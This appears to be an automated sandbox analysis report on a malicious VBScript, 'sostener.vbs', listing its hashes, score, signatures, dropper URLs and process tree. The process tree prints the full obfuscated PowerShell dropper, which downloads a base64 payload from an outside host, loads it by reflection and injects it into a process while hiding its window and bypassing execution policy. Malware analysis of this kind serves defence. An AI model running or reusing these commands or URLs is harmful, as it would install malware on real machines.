Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 08:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    499KB

  • MD5

    3b4164bdb4cf6c49570c95714f8c17a5

  • SHA1

    13c7abef0333088056a8c11c951c97fcb878ad96

  • SHA256

    fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4

  • SHA512

    460bf20b6d30b4314703b67356828e540db80b43e3afc37ce2d075660370a4a306659075abe4a6895039df86316d95756441e40546d8d72daef7c5c11e7155ac

  • SSDEEP

    12288:n9D/msDMDwwpZcKHg9NR4A6sgmkhf1dM4Y6ebu5Z2PqoKuN8HUe5FXNbSEKOsyTE:Sbqj

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7JM25NWN6JZB4GG52ZCB.temp
    Filesize

    7KB

    MD5

    d7d2961da828a64e2c3192173b265287

    SHA1

    f07fc7a5eacae6cd406979f24f90e9581a7c6375

    SHA256

    562d6f90ce42b55d29e1653e9116f598053f7fc3b2f79d7cef57aa4dbf939a0b

    SHA512

    6f5e2c27b1dd96a7b65c12edcb19527599aefe69f4ae8147c8cc455fcb6f4906594033afdaa9d963c9792645efc2b1e3c53b340edad7bbd377fcc49c5be4a53f

    Download Submit

  • memory/2400-4-0x000007FEF5C8E000-0x000007FEF5C8F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2400-5-0x000000001B560000-0x000000001B842000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2400-6-0x0000000002040000-0x0000000002048000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2400-7-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2400-8-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2400-9-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2400-10-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2400-16-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

    Filesize

    9.6MB

    Download